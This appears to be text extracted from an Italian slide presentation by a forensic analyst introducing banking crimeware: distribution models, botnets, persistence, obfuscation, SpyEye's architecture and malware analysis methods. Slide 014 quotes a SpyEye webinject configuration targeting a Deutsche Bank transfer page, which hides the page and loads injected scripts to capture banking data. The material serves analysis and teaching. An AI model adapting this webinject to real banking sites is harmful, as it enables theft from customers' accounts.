Professional Documents
Culture Documents
INTRODUZIONE AL CRIMEWARE
NEL
SETTORE BANCARIO
This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts. Within this context, other financial services such as, for instance, online stock exchange operations are also considered electronic banking.
001
002
003
Malware Developing
004
Malware Distribution
User
005
Malware Distribution
Pay-per-Install
Drive-by-Download
Exploit-as-a-Services
006
Ciclo Pay-per-Install
Exploit-as-a-Services
007
Exploit Pack
<script var a= var xl if(xls
Infection
008
Flat Botnet
P2P Botnet
009
Rendere Persistent il MW
(ad es. con la modifica del registry)
Injection
010
Odore di $$$
data theft
User
011
012
Obfuscation
013
Struttura di SpyEye
C&C
Packer Obfuscation Anti-Dbg
Binary
014
set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP data_before <body data_end data_inject style="visibility:hidden data_end data_after id= data_end data_before </body> data_end data_inject <script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script> <script src='/error.html/trxm1/dbcommon.js'></script> <script src='/error.html/trxm1/dbsepa.js'></script> <script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script> data_end data_after </html> data_end ..
015
016
017
User
a Chi Trasmettere i dati collezionati dal MW definito in collectors.txt
018
MW Analysis
Live Analysis
File Analysis
Disassebling
Debugging
Memory Dumping
GRAZIE
Francesco Schifilliti
fschifilliti@forensictech.it